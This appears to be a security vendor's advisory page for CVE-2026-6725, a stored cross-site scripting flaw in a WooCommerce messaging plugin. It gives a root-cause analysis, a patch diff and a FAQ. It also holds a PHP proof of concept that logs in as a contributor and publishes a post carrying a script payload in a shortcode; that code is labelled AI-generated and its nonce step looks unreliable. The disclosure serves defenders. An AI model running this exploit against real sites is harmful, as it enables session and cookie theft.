What is CVE-2026-6725?

CVE-2026-6725 is a Stored Cross-Site Scripting (XSS) vulnerability in the WPC Smart Messages for WooCommerce plugin, affecting versions up to 4.2.8. It allows authenticated users with contributor-level access or higher to inject arbitrary scripts via the ‘text’ attribute of the ‘wpcsm_text_rotator’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes. An attacker can insert a malicious payload in the shortcode’s ‘text’ attribute, which gets executed in the browser of anyone viewing the affected page.

Who is affected by this vulnerability?

Any WordPress site using the WPC Smart Messages plugin version 4.2.8 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WPC Smart Messages plugin installed. If it is version 4.2.8 or earlier, your site is at risk. Additionally, review any posts or pages that use the ‘wpcsm_text_rotator’ shortcode.

What should I do to fix this vulnerability?

To mitigate this issue, update the WPC Smart Messages plugin to version 4.2.9 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.

What is the severity level of this vulnerability?

CVE-2026-6725 has a CVSS score of 6.4, indicating a medium severity level. This means while it is not the most critical vulnerability, it still poses a significant risk that could lead to serious security issues if exploited.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can log into a WordPress site and use the vulnerable shortcode to inject a script. This illustrates the ease with which an authenticated user can exploit the vulnerability to execute arbitrary code.

What changes were made in the patched version?

In version 4.2.9, the plugin was updated to include proper output escaping for the ‘text’ attribute. This prevents malicious scripts from being executed by encoding any HTML or JavaScript in the attribute.

Is there a way to mitigate risks if I cannot update immediately?

If immediate updating is not possible, consider disabling the WPC Smart Messages plugin until it can be updated. Additionally, review user permissions and limit access to only those who need it to reduce the risk of exploitation.

What should I do if I suspect my site has been compromised?

If you suspect exploitation of this vulnerability, immediately change all user passwords, review site logs for unauthorized access, and consider restoring from a backup. Conduct a security audit to identify and remediate any other potential vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2026-6725 can be found on the National Vulnerability Database (NVD) or the CVE database. Additionally, reviewing the plugin’s changelog and security advisories from the developer can provide insights into the vulnerability and its mitigation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 27, 2026

CVE-2026-6725: WPC Smart Messages for WooCommerce <= 4.2.8 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attribute (wpc-smart-messages)

Q: What are the practical risks associated with this vulnerability?

If exploited, this vulnerability could allow attackers to inject JavaScript into pages, leading to session hijacking, cookie theft, phishing attacks, or site defacement. The impact can be severe, especially for sites with administrative user access.

CVE ID CVE-2026-6725

Plugin wpc-smart-messages

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 4.2.8

Patched Version 4.2.9

Disclosed April 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6725: This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the WPC Smart Messages for WooCommerce plugin, versions up to and including 4.2.8. It affects the ‘wpcsm_text_rotator’ shortcode. An authenticated attacker with contributor-level access or higher can inject arbitrary web scripts. The vulnerability carries a CVSS score of 6.4 (Medium).

The root cause lies in insufficient input sanitization and output escaping of user-supplied shortcode attributes. In the file ‘wpc-smart-messages/includes/class-shortcode.php’, the ‘text’ attribute of the ‘wpcsm_text_rotator’ shortcode is output directly into HTML without escaping. The vulnerable code is on line 459: `$output .= ‘‘ . $attrs[‘text’] . ‘‘;`. Similarly, on lines 493 and 497, the ‘text’ attribute is used as a format string in `sprintf()` without escaping: `sprintf( $attrs[‘text’], … )`.

Exploitation requires an attacker to be an authenticated user with at least contributor-level permissions in WordPress. The attacker creates or edits a post or page and inserts the ‘wpcsm_text_rotator’ shortcode. The attacker provides a malicious payload in the ‘text’ attribute of the shortcode. For example: `[wpcsm_text_rotator text=”alert(‘XSS’)”]`. When the page is rendered for any visitor, the injected script executes in their browser context.

The patch, introduced in version 4.2.9, applies proper output escaping. The direct output of the ‘text’ attribute on line 459 is now wrapped with `esc_html()`: `esc_html( $attrs[‘text’] )`. The format string usage in `sprintf()` on lines 493 and 497 is also sanitized: `sprintf( esc_html( $attrs[‘text’] ), … )`. This ensures any HTML or JavaScript in the attribute is encoded, preventing script execution.

Successful exploitation allows an attacker to inject arbitrary JavaScript into pages of the WordPress site. This can lead to session hijacking, cookie theft, phishing attacks, defacement, or redirection to malicious sites. The attack executes in the security context of the logged-in user viewing the page, potentially compromising administrative accounts.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wpc-smart-messages/includes/class-shortcode.php
+++ b/wpc-smart-messages/includes/class-shortcode.php
@@ -456,7 +456,7 @@
 				'animation' => 'dissolve' //dissolve (default), fade, flip, flipUp, flipCube, flipCubeUp and spin
 			], $attrs );

-			$output .= '<span class="wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['speed'] ) . '">' . $attrs['text'] . '</span>';
+			$output .= '<span class="wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['speed'] ) . '">' . esc_html( $attrs['text'] ) . '</span>';

 			return apply_filters( 'wpcsm_shortcode_live_number', $output, $attrs );
 		}
@@ -484,11 +484,11 @@
 				}

 				$output .= '<span class="wpcsm-number-rotator">';
-				$output .= sprintf( $attrs['text'], '<span class="wpcsm-number-rotator-value wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['duration'] ) . '">' . implode( ', ', $rand_values ) . '</span>' );
+				$output .= sprintf( esc_html( $attrs['text'] ), '<span class="wpcsm-number-rotator-value wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['duration'] ) . '">' . implode( ', ', $rand_values ) . '</span>' );
 				$output .= '</span>';
 			} else {
 				$output .= '<span class="wpcsm-live-number" data-val="' . esc_attr( $rand ) . '" data-min="' . esc_attr( $attrs['min'] ) . '" data-max="' . esc_attr( $attrs['max'] ) . '" data-step="' . esc_attr( $attrs['step'] ) . '" data-duration="' . esc_attr( $attrs['duration'] ) . '" data-text="' . esc_attr( $attrs['text'] ) . '">';
-				$output .= sprintf( $attrs['text'], '<span class="wpcsm-live-number-value">' . $rand . '</span>' );
+				$output .= sprintf( esc_html( $attrs['text'] ), '<span class="wpcsm-live-number-value">' . $rand . '</span>' );
 				$output .= '</span>';
 			}

--- a/wpc-smart-messages/wpc-smart-messages.php
+++ b/wpc-smart-messages/wpc-smart-messages.php
@@ -3,7 +3,7 @@
 Plugin Name: WPC Smart Messages for WooCommerce
 Plugin URI: https://wpclever.net/
 Description: Display messages throughout your store through smart conditional logic settings.
-Version: 4.2.8
+Version: 4.2.9
 Author: WPClever
 Author URI: https://wpclever.net
 Text Domain: wpc-smart-messages
@@ -12,12 +12,12 @@
 Requires at least: 4.0
 Tested up to: 6.9
 WC requires at least: 3.0
-WC tested up to: 10.6
+WC tested up to: 10.7
 License: GPLv2 or later
 License URI: http://www.gnu.org/licenses/gpl-2.0.html
 */

-! defined( 'WPCSM_VERSION' ) && define( 'WPCSM_VERSION', '4.2.8' );
+! defined( 'WPCSM_VERSION' ) && define( 'WPCSM_VERSION', '4.2.9' );
 ! defined( 'WPCSM_LITE' ) && define( 'WPCSM_LITE', __FILE__ );
 ! defined( 'WPCSM_FILE' ) && define( 'WPCSM_FILE', __FILE__ );
 ! defined( 'WPCSM_URI' ) && define( 'WPCSM_URI', plugin_dir_url( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6725 - WPC Smart Messages for WooCommerce <= 4.2.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attribute

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL
$username = 'attacker'; // CHANGE THIS to a contributor+ username
$password = 'password'; // CHANGE THIS to the user's password

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

if (strpos($response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Step 2: Get the necessary nonce for creating a post (optional, for direct post creation via REST API)
// This simplified PoC uses a known post ID or creates a new one manually.
// For demonstration, we'll use the WordPress REST API to create a new post with the malicious shortcode.

$rest_url = $target_url . '/wp-json/wp/v2/posts';
$payload = [
    'title' => 'XSS Test Post',
    'content' => '[wpcsm_text_rotator text="<script>alert(document.cookie)</script>"]',
    'status' => 'publish'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . get_nonce($target_url) // Function to extract nonce from cookie
]);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

if ($response === false) {
    die('cURL error: ' . curl_error($ch));
}

$result = json_decode($response, true);
if (isset($result['id'])) {
    echo 'Post created with ID: ' . $result['id'] . PHP_EOL;
    echo 'Malicious shortcode injected. Visit: ' . $result['link'] . PHP_EOL;
} else {
    echo 'Post creation failed. Response: ' . $response . PHP_EOL;
}

curl_close($ch);

function get_nonce($base_url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $base_url . '/wp-admin/admin-ajax.php?action=rest-nonce');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    $nonce = trim(curl_exec($ch));
    curl_close($ch);
    return $nonce;
}
?>

Frequently Asked Questions

What is CVE-2026-6725?
Overview of the vulnerability
CVE-2026-6725 is a Stored Cross-Site Scripting (XSS) vulnerability in the WPC Smart Messages for WooCommerce plugin, affecting versions up to 4.2.8. It allows authenticated users with contributor-level access or higher to inject arbitrary scripts via the ‘text’ attribute of the ‘wpcsm_text_rotator’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes. An attacker can insert a malicious payload in the shortcode’s ‘text’ attribute, which gets executed in the browser of anyone viewing the affected page.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the WPC Smart Messages plugin version 4.2.8 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the WPC Smart Messages plugin installed. If it is version 4.2.8 or earlier, your site is at risk. Additionally, review any posts or pages that use the ‘wpcsm_text_rotator’ shortcode.
What should I do to fix this vulnerability?
Recommended actions
To mitigate this issue, update the WPC Smart Messages plugin to version 4.2.9 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-6725 has a CVSS score of 6.4, indicating a medium severity level. This means while it is not the most critical vulnerability, it still poses a significant risk that could lead to serious security issues if exploited.
What are the practical risks associated with this vulnerability?
Potential consequences
If exploited, this vulnerability could allow attackers to inject JavaScript into pages, leading to session hijacking, cookie theft, phishing attacks, or site defacement. The impact can be severe, especially for sites with administrative user access.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an attacker can log into a WordPress site and use the vulnerable shortcode to inject a script. This illustrates the ease with which an authenticated user can exploit the vulnerability to execute arbitrary code.
What changes were made in the patched version?
Details of the fix
In version 4.2.9, the plugin was updated to include proper output escaping for the ‘text’ attribute. This prevents malicious scripts from being executed by encoding any HTML or JavaScript in the attribute.
Is there a way to mitigate risks if I cannot update immediately?
Temporary measures
If immediate updating is not possible, consider disabling the WPC Smart Messages plugin until it can be updated. Additionally, review user permissions and limit access to only those who need it to reduce the risk of exploitation.
What should I do if I suspect my site has been compromised?
Response steps
If you suspect exploitation of this vulnerability, immediately change all user passwords, review site logs for unauthorized access, and consider restoring from a backup. Conduct a security audit to identify and remediate any other potential vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-6725 can be found on the National Vulnerability Database (NVD) or the CVE database. Additionally, reviewing the plugin’s changelog and security advisories from the developer can provide insights into the vulnerability and its mitigation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations